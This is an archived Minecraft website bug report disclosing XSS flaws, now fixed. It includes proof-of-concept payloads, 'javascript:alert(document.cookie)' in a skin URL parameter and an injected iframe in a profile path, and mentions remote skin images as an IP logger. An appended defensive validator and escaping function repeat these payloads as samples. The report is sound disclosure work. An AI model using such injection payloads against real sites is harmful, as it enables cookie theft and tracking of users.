Mojira Archive
WEB-1212

Dangerous vulnerabilities (XSS/IP logger)

Hello, I found a bug in setting skin (img tag) and XSS.
Links:
https://my.minecraft.net/profile/skin/remote?url=https://techcrunch.com/wp-content/uploads/2015/08/safe_image.gif

https://my.minecraft.net/profile/skin/remote?url=javascript:alert(document.cookie);

(The picture can be an IP logger.)

https://minecraft.net/en-us/profile/redeemCape/<iframe src=javascript:alert(document.cookie)>

It would be nice if I received a bug bounty.

Fixed

Jakub Szturomski

[Mojang] Web Team

2019-01-28, 01:06 AM

2020-05-25, 08:46 AM

2020-05-25, 08:46 AM

0

2
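
A server-side check for the two inputs named in the report above, written as an added example; it is not part of the original report and is not Mojang's code or its actual fix. The function names and the `skins.example.com` allowlist are hypothetical. The first function restricts the `url` parameter to `https` on an allowlisted host, which rejects both the `javascript:` value and an arbitrary third-party image; the second escapes a path segment before it is echoed into HTML.

```javascript
// Hypothetical allowlist: the only hosts a remote skin may be loaded from.
const ALLOWED_SKIN_HOSTS = new Set(["skins.example.com"]);

// Returns the normalized URL string, or null if the value must be rejected.
function validateRemoteSkinUrl(raw) {
  if (typeof raw !== "string" || raw.length > 2048) return null;
  let u;
  try {
    u = new URL(raw); // absolute URLs only; relative values throw
  } catch {
    return null;
  }
  // Scheme allowlist: javascript:, data: and plain http: are all refused.
  if (u.protocol !== "https:") return null;
  // Refuse embedded credentials (user@host forms).
  if (u.username || u.password) return null;
  // Host allowlist: an arbitrary third-party image would otherwise be fetched
  // by every viewer's browser, exposing their IP address to that host.
  if (!ALLOWED_SKIN_HOSTS.has(u.hostname)) return null;
  return u.href;
}

// Escapes text for an HTML element or quoted-attribute context, for values
// such as a path segment that the page echoes back to the user.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Inputs taken from the report, plus one constructed allowlisted URL.
const samples = [
  "https://techcrunch.com/wp-content/uploads/2015/08/safe_image.gif",
  "javascript:alert(document.cookie);",
  "https://skins.example.com/steve.png", // constructed
];
for (const s of samples) {
  console.log(s, "->", validateRemoteSkinUrl(s));
}
console.log(escapeHtml("<iframe src=javascript:alert(document.cookie)>"));
```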